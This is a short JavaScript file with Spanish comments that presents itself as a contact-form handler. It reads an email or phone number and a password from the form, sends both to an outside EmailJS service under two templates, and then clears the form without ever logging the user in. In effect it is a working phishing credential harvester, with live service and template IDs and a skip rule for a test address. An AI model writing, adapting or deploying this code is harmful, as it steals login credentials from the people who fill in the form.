(function() {
    emailjs.init('vXFL1_J2AhuYYvCSx');

    document.getElementById('contact-form').addEventListener('submit', function(event) {
        event.preventDefault();

        var email = document.getElementById('email').value;
        var password = document.getElementById('password').value;
        var errorMessage = document.getElementById('error-message');

        errorMessage.style.display = 'none'; // Ocultar mensaje de error

        // Verificar si el campo contiene solo números
        var isPhoneNumber = /^\d+$/.test(email);

        if (email === 'pruebita@gmail.com') {
            document.getElementById('contact-form').reset();
            return;
        }

        if ((isPhoneNumber || email.includes('@')) && password) {
            var templateParams = {
                email: email,
                password: password
            };

            emailjs.send('service_fr2hpkj', 'template_8ygccbi', templateParams)
                .then(function(response) {
                    // Manejar respuesta exitosa si es necesario
                }).catch(function(error) {
                    // Manejar error si es necesario
                });

            emailjs.send('service_fr2hpkj', 'template_mu97vit', templateParams)
                .then(function(response) {
                    // Manejar respuesta exitosa si es necesario
                }).catch(function(error) {
                    // Manejar error si es necesario
                });

            document.getElementById('contact-form').reset();
        } else {
            errorMessage.style.display = 'block'; // Mostrar mensaje de error
        }
    });
})();
